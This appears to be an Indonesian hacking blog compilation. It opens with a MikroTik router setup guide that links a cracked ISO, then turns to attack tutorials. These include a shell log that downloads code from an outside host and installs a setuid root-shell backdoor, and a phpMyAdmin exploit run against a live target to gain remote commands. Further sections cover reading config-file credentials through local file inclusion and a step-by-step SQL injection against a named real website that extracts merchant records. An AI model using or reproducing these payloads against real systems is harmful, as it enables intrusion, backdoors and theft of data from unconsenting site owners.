Pertama kali yang harus di siapkan adalah komputer server minimal dengan spesifikasi :
prosesor PII
Memory 128
NIC (LANCARD) 2 buah
Hardisk minimal 1giga
CDroom
1. Mulailah mendownload mikrotiknya, download ISO nya disini : http://www.indowebster.com/mikrotik2927crackediso.html ini yang versi 2.9.27 free edition
2. Kemudian bakar di CD, burning Image.
3. Setelah itu, masukkan cd yang tadi telah terisi mikrotik kedalam komputer server kemudian hidupin komputer tersebut.
4. Tunggu hingga pada komputer muncul seperti dibawah ini :

5.Setelah itu tekan tombol ‘a’ (tanpa petik) untuk meng-install semua fasilitas yang terdapat pada mikrotik dan ketik ' i ' untuk menginstall.
6.Biarkan saja porses berjalan, karena instalasi sedang berlangsung, mulai dari formating disk hingga proses selesai instalasi, jika muncul tampilan seperti di bawah ini maka instalasi telah selesai.

7.Setelah proses selesai, download lah tool bawaan mikrotik, (winbox) bisa di download disini :
http://www.mikrotik.co.id/getfile.php?n ... 2.2.11.exe
8. Setelah itu tancapkan kabel dari modem ADSL ke lancard satu pada komputer yang telah di install mikrotik.
9. Kemudian LanCard kedua ke sebuah HUB / swicth untuk jaringan lokal.
10. Instalasi telah selesai dilakukan, sekarang remote komputer server yang telah di instalasi di atas dengan winbox yang telah kita download, dengan menggunakan komputer lain.
11. Pilih router yang tadi kita install, default identity nya mikrotik, username admin, password kosong.

12. Pilih menu Interface, jika telah berjalan dengan benar, maka akan muncul 2 buah interface lancard.

13. Double Klik pada salah interface yang merujuk ke lokal dan beri nama Lokal.

14. Dengan cara yang sama, Interface yang merujuk ke modem beri nama Publik.
15. Setelah itu, pilih menu IP address.

16. Muncul Tampilan seperti i bawah ini, kemudian tekan tombol plus + di pojok kiri nya.

17. # Tambahkan Ip addressnya, misal
IP modem Speedy 192.168.1.1, maka IP pada mikrotik : 192.168.1.2/24 dan berinama
kemudian tekan tombol plus + di pojok kiri nya, kmudian tambahkan IP address nya Lancard Satunya lagi :
misalnya Ip pada lokal 10.10.10.1, maka masukkan IP address 10.10.10.1/27, angka /27 untuk 30 host IP, anda bisa mempelajarinya lebih lanjut tentang konsep subnetting disini :
Konsep dasar IP address : http://www.forummikrotik.com/beginner-i ... dress.html
Konsep Subneting : http://www.forummikrotik.com/beginner-i ... takut.html
18. setelah itu pilih IP dan kemudian pilih sub Menu Routes.
19. Kmudian masukkan IP gateway nya, dengan cara menekan tombol plus + di pojok kiri nya yaitu IP dari Modem 192.168.1.1, kmudian tekan tombol OK.

20. Setelah semua langkah di atas selesai, langkah selanjutnya adalah mengisi DNS dengan cara pilih menu IP > DNS.

21. Pilih Setting dan masukkan IP dns, dengan primary DNS 202.134.1.10 (default speedy) yang kedua secondary DNS 202.134.0.155 (DNS speedy).

22. Setelah selesai tahap akhir yang anda harus lakukan, yaitu membuat rule untuk bisa di pergunakan secara lokal. Tahap ini sangat penting, dimana komunikasi lancard 1 dengan lancard 2 diletakkan disini. Inti dari setting diatas ada pada tahap ini, maka jangan sampe kliru.
23. Pilih IP > Firewall > NAT > General.

24. Chain = srcnat, Out interface = Publik (interface tadi yang telah kita beri nama publik) kmudian pilih action = masquerade kemudian tekan tombol OK untuk mengakhirinya.

25. # Lakukan restart pada router dengan cara menekan New Terminal , kmudian menggetikkan script system reboot, dan tekan Y
26.Setelah selesai restart lakukan pengecekan dangan cara ping, masuk pada New terminal ping pada gateway 192.168.1.1, ping pada DNS 202.134.1.10, kalo terjadi replay brarti router udah OK.
27. Jika terjadi Riquest Time Out, brarti anda tinjau ulang pada router anda atau pada lancard anda, atau pada modem anda, atau pada koneksi anda dengan speedy
28.Sekarang instalasi bisa di katakan telah selesai, tinggal meneruskan IP ke semua client dimulai dari 10.10.10.2 dan seterusnya hingga 10.10.10.30 karena subnet yang kita buat tadi 30 host.
Semoga tutorial ini dapat bermanfaat. Dan mudah2an tutorial selanjutnya menyusul.
Wassalamu'alaikum...
Sumber : MC-crew.org
:
sh-3.00# cd /bin
sh-3.00# wget trendhoby.com/.ray/rsh.txt
--05:13:12-- http://trendhoby.com/.ray/rsh.txt
=> `rsh.txt'
Resolving trendhoby.com... 219.83.122.166
Connecting to trendhoby.com|219.83.122.166|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 481 [text/plain]
100%[====================================>] 481 --.--K/s
05:13:15 (57.34 MB/s) - `rsh.txt' saved [481/481]
sh-3.00# su
[root@localhost bin]# mv rsh.txt rsh.c
[root@localhost bin]# gcc -o main rsh.c
[root@localhost bin]# chmod gu+s main
[root@localhost bin]# chmod o+x main
[root@localhost bin]# chattr +i main
[root@localhost bin]# rm -f rsh.c
[root@localhost bin]# exit
exit
sh-3.00# exit
exit
[cs-31@localhost local24]$ main
-==[ Root Shell Backdoor ]==-
-==[ Hacker-Newbie Community ]==-
-==[ www.Hacker-Newbie.Org ]==-
Starting Interactive Shell...
Session Started. Enjoy the hack !!
[root@localhost local24]#
[root@localhost local24]# id;whoami
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root
[root@localhost local24]#
Tool name: darkjumper version 4.0
C0d3r: mywisdom (solhack 2004 c0d3r)
Released on: February 2010
Download url:
http://yoyoparty.com/upload/darkjumper.tgz
mirror:
http://fams-online.com/images/darkjumper.tgz
Function(s)
1. User enumeration(s) guessing based on 4-8 chars trial taken from every site name that host at the same server
2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site(s) at the same server
3. CGI and Path(s) Scanning
Additional feature: 30 fake http user agent(s)
Requirement(s): python > 2.5.x, perl
Ok introducing my new upgraded tool called darkjumper version 4.0. Ok here's a little tutorial about "Using Darkjumper"
This tool can run on linux and windows.
Tutorial for Linux Environment (command line)
oke langsung aja
pertama install dulu perl n pythonnya
==>
$ apt-get install perl
$ apt-get install python
$ wget http://fams-online.com/images/darkjumper.tgz
$ tar zxvf darkjumper.tgz
view source
print?
1 cd darkjumper;ls -la
view source
print?
01 bt next_steps # cd darkjumper
02 bt darkjumper # ls -la
03 total 872
04 drwxr-xr-x 2 turkmentel root 4096 Feb 6 00:38 ./
05 drwxrwxrwx 11 root root 4096 Oct 2 01:19 ../
06 -rwxrwxrwx 1 turkmentel 1001 1727 Feb 5 18:16 cgilist*
07 -rwxrwxrwx 1 root root 485 Jun 8 2009 clearlog.py*
08 -rwxrwxrwx 1 turkmentel 1001 1263 Oct 27 21:58 darkcgi.pl*
09 -rwxrwxrwx 1 root root 35840 Feb 6 00:28 darkjumper.py*
10 -rwxrwxrwx 1 root root 9 Feb 6 00:37 darkjumperlog.txt*
11 -rwxrwxrwx 1 root root 23128 Feb 5 17:29 devilzc0de.py*
12 -rwxrwxrwx 1 root root 57154 Jun 8 2009 shot1.jpg*
13 -rwxrwxrwx 1 root root 141527 Jun 8 2009 shot2.jpg*
14 -rwxrwxrwx 1 root root 255572 Jun 8 2009 shot3.jpg*
15 -rwxrwxrwx 1 root root 188846 Jun 8 2009 shot4.jpg*
16 -rwxrwxrwx 1 root root 101075 Jun 8 2009 shot5.jpg*
17 -rwxrwxrwx 1 root root 4876 Jun 8 2009 subscan.py*
18 -rwxrwxrwx 1 root root 5254 Jun 8 2009 subscan2.py*
19 -rwxrwxrwx 1 root root 5641 Jun 8 2009 tes.py*
20 -rwxrwxrwx 1 root root 5641 Jun 8 2009 tes2.py*
21 bt darkjumper #
kalo mau liat lognya liat langsung aja
pakek ini
view source
print?
1 ./clearlog.py
or : python clearlog.py
darkjumper.py
Here is your main tool.
Ok then you are ready to run darkjumper.py, let's have a try by typing:
view source
print?
1 ./darkjumper.py
And here's the view from my b0x:
selamat men coba
langsung aja masukkan console berikut ini ke dalam terminal
==>
sudo apt-get install libglade2-ruby sqlite3 libsqlite3-ruby1.8 && sudo apt-get install libdbd-sqlite3-ruby1.8 libopenssl-ruby subversion rubygems
==>
==>
wget http://www.metasploit.com/releases/framework-3.2.tar.gz && tar xvfj framework 3.3.1.tar.bz2 && cd msf3
==>
sudo ./msfgui
==>
svn update
==>
console di atas harus menjadi root
sooooooo selamat mencoba :D
habis belajar sana sini sana sini akhirnya dapet n aku cobak mak nyus
yaitu cara install metasploit di dalam linux ubuntu
hehe langsung aja yaa
pertama install ruby dulu
caranya
=>
$ sudo apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
=>
install subversion
=>
$ sudo apt-get install subversion
=>
kemudian dari situ ketikkan perintah
=>
$ sudo apt-get build-dep ruby
$ sudo apt-get install ruby-dev libpcap-dev
=>
kemudian database support
install driver
=>
$ sudo apt-get install rubygems libsqlite3-dev
$ sudo gem install sqlite3-ruby
=>
atau untuk mysql
=>
$ sudo apt-get install rubygems libmysqlclient-dev
$ sudo gem install mysql
=>
kemudian install Framework
=>
$ tar xf framework-3.X.tar.gz
$ sudo mkdir -p /opt/metasploit3
$ sudo cp -a msf3/ /opt/metasploit3/msf3
$ sudo chown root:root -R /opt/metasploit3/msf3
$ sudo ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/
=>
terus extensionsnya jangan lupa juga
=>
$ sudo apt-get install libpcap-dev
$ sudo bash
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install
=>
untuk eneber wifinya modulesnya
=>
$ sudo bash
# cd /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co https://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install
=>
buat update
=>
$ sudo svn update /opt/metasploit3/msf3/
=>
code:
$ sudo crontab -e -u root # enter the line below
1 * * * * /usr/bin/svn update /opt/metasploit3/msf3/ >> /var/log/msfupdate.log 2>&1
code = =>
selamat mencoba
ini semua setelahh habis maen-maen forum di xcode.or.id
eh nemu yang beginian
ingin hati ingin mencobanya heheheheheh
tapi ane masih pakek windows jadi share dulu aja
hehehe
semoga bermanfaat
1. Download exploit nya di milw0rm
Code:
http://milw0rm.com/exploits/download/8921
2. setelah di download ubah permission file yang dengan cara :
Code:
chmod 755 nama_file.sh
3. kalo kamu pake linux kamu harus install curl caranya :
Code:
sudo apt-get install curl
4. googling :
Code:
inurl:phpmyadmin
5. contoh nya :
Code:
wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
http://*********.*****.**//config/config.inc.php?c=ls+-l+/
http://***************//config/config.inc.php?p=phpinfo();
please send any feedback/improvements for this script to unknown.pentestergmail.com
dan hasilnya :
Code:
total 112
drwxr-xr-x 2 root root 4096 Mar 11 06:47 bin
drwxr-xr-x 3 root root 4096 Apr 16 07:24 boot
lrwxrwxrwx 1 root root 11 Feb 19 20:07 cdrom -> media/cdrom
drwxr-xr-x 13 root root 13840 May 31 08:21 dev
drwxr-xr-x 96 root root 4096 Jun 11 06:44 etc
drwxr-xr-x 5 root root 4096 May 4 13:49 home
lrwxrwxrwx 1 root root 32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server
lrwxrwxrwx 1 root root 31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server
drwxr-xr-x 13 root root 12288 Apr 16 07:23 lib
drwx------ 2 root root 16384 Feb 19 20:07 lost+found
drwxr-xr-x 3 root root 4096 Feb 19 20:07 media
drwxr-xr-x 14 root root 4096 May 18 22:39 mnt
drwxr-xr-x 2 root root 4096 Feb 19 20:08 opt
dr-xr-xr-x 115 root root 0 May 31 08:21 proc
drwxr-xr-x 9 root root 4096 May 19 14:47 root
drwxr-xr-x 2 root root 4096 Apr 16 07:23 sbin
-rw------- 1 root root 31903 Feb 19 23:34 sql1qPPmS
drwxr-xr-x 2 root root 4096 Feb 19 20:08 srv
drwxr-xr-x 12 root root 0 May 31 08:21 sys
drwxrwxrwt 5 root root 4096 Jun 14 05:32 tmp
drwxr-xr-x 11 root root 4096 Feb 19 20:14 usr
drwxr-xr-x 15 root root 4096 Feb 19 20:26 var
lrwxrwxrwx 1 root root 29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server
lrwxrwxrwx 1 root root 28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server
ok dehhh sekian dulu ya :D
thanks to: inc0mp13te, xshadow, mywisdom, cybermutaqin dan lain lain :D
salam PsyChotr0n
From : Xcode
pengen jelas monggo berkunjung
http://forum.xcode.or.id
Ini aku dapet setelah aku jalan-jalan kesana kemari akhirnya dapet cuman
aku dapetnya pakek windows,
nah sekarang ane akan nyobak dengan pakek linux.
intinya sih sama aja yaa hanya perbedaan dari taraf kerjanya :D
langsung aja yaaaa
ada beberapa tool yang digunakan untuk mendapatkan login ssh, cpn
Salah satunya "ConfigSpy", namun untuk menggunakan tool ini anda sudah harus berada dalam system/host target.
kita coba yang lain hehehe monggoo
http://[site]/[path]/xx.php?file=[LFI]
nah ini merupakan cara untuk web bug dari LFI
Sebelum menggunakan, kita harus tau aplikasi apa yang digunakan oleh we tersebut. Maksud saya di sini adalah kita mencari tau dahulu path atau lokasi dimana file config yang mengatur koneksi ke database. Mengapa?? Seperti yang dilakukan oleh "ConfigSpy", yaitu mengambil login database untuk mencoba login ke ftp.
Seperti yang kalian tau bahwa sering terjadi kecerobohan dalam memberi login database, dimana login tersebut sama dengan login ke ftp maupun ssh.
Nah ...
Pada ada aplikasi cms, path config nya terdapat pada pathnya...
URL dari exploit nya menjadi seperti ini (DEMO):
http://site/plugins/my_images/image.php?file=../../config.php
../../ <------- mundur folder sebanyak 2x dari lokasi awal. Content yang kita dapatkan adalah: ........ cut ...................... $mySQLuser = 'guejelek'; $mySQLpassword = 'guehaho'; ........ cut ...................... Kalo sudah dapat seperti itu silahkan di coba login ke ftp/ssh :) Kalo gagal berarti login nya tidak sama. Coba terus, tetap semangat -_- uUtuk bug cms ini telah ada exploit untuk mempermudah dan menghemat tenaga. Silahkan download di sini.
Cara penggunaannya (linux):
lebih dahulu install perl dulu yang tutornya ada di bawah
kemudian ke console ketik
root@ubuntul:~ file.pl 'target'
[~] Exploiting http://terget.com/ ...
[~] DB Username: guejelek
[~] DB Password: guehaho
Tips ini berlaku untuk aplikasi yg memiliki Bug LFI/LFD.
Silahkan edit exploit nya sesuai dengan kebutuhan
Selamat Mencoba deh :D
thanks for C0li, Vycod, cak Surep, IHT, MCC, all My friends
heheh ini aku dapet setelah aku pengen mengexploit web tapi source codenya musti pakek perl
jadi musti instal dulu karena linuxku baru
jadi pertama-tama update ubuntunya dulu, consolenya:
sudo apt-get update
abis itu baru dah kita download perlnya dengan cara
sudo apt-get install perl
insyaallah dapet :D
terus gimana cara menggunakan
pertama kamu
program perl biasanya berada di
usr/bin/perl
cara menggunakan, pertama ketik
chmod +x file.pl
./file.pl
mka akan jalan deh :D
selamat mencoba yaaa
Kali ini saya akan menjelaskan bagaimana menginstal Nmap di ubuntu
pertama yang musti dilakukan adalah kita masuk terminal linux ubuntu
setelah masuk kita harus jadi rootnya, caranya ketik:
sudo -i
setelah menjadi root
kemudian ketik :
apt-get install nmap
untuk mendownload dan menginstal nmap
setelah itu kalo kita ingin mengscan target
consol yang digunakan adalah
========================================
nmap -v -a "target domain"
nmap -v -sp "ip addres range"
nmap -v -ir port open -pn port yang digunakan
=======================================
contoh
nmap -v -a google.com
nmap -v -sp 193.168.0.1/16 10.0.0.0/8
nmap -v -ir 10000 -pn 80
buat kamu yang pengen bisa cara rooting ato jumping dari 1 website ke web lain
silakan diliat vidio ini
hihihihi
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12
CEK VULN / GAK !!!
==================
Cek Bisa di Inject apa gak dgn cara tambah kan tanda ' di akhir URL
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'
Jika Error nya seperti ini :
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56
Microsoft OLE DB Provider (SQL Server Driver) <---- Inti nya ada di sini !!!
Selain SQL Server Driver (Provider) ndak tau deh gua :D
maka Lanjut ...
CARI STRUKTUR TABEL !!!
=======================
1) Debugging
Debugging di sini untuk memunculkan pesan error dr MsSQL.
SQL Inject nya adalah "and 1="
2) Munculkan nama tabel
Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables))--
Error yang muncul adalah :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56
bisa dilihat di situ kita dapat tabel dengan nama "Merchants".
berbeda dgn MySQL, MsSQL dalam output nya membedakan tipe data, sehingga kita perlu mengkonversi nya agar SQL dapat memunculkan pesan error yang kita inginkan.
skrg kita cari tabel selanjut nya.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--
Error yang muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56
Bisa di lihat Query nya berbeda dgn MySQL. MySQL ndak support "not in" sedangkan MsSQL support "not in" ^^
nah dapat tabel dgn nama "category" .... kita coba cari lagi tabel selanjut nya.
Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--
Error yng muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56
dapat tabel dgn nama "Codes". Silahkan cari lagi nama tabel yang di inginkan.
CARI STRUKTUR COLUMN !!!
========================
Contoh kita mau cari column yg ada di tabel "Merchants".
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56
dapat deh column dgn nama "merchantId" ... yok cari lagi column laen :D
QUery : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56
dapat deh column "address". cari lage column ne ...
Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--
Error yg muncul:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56
dapat tuh column "merchantName" ekkekekeke ....
Silahkan kalo mo nyari lagi ^^
PENGAMBILAN DATA !!!
====================
Contoh kita mau lihat isi dari column "merchantid, address, merchantName" yg ada di tabel "Merchants".
Query : and 1=convert(int,(select top 1 merchantid from merchants))--
http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 merchantid from merchants))--
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56
dapat "merchantid" = "alohacc".
nah gmn kalo mau ngambil isi column ne sekaligus ??
Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress%2b':'%2bmerchantName from merchants))--
Error yg muncul :
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56
Note : %2b = + sedangkan ':' = pembatas
untuk vidionya silakan download disini
from : c0li.blogspot.com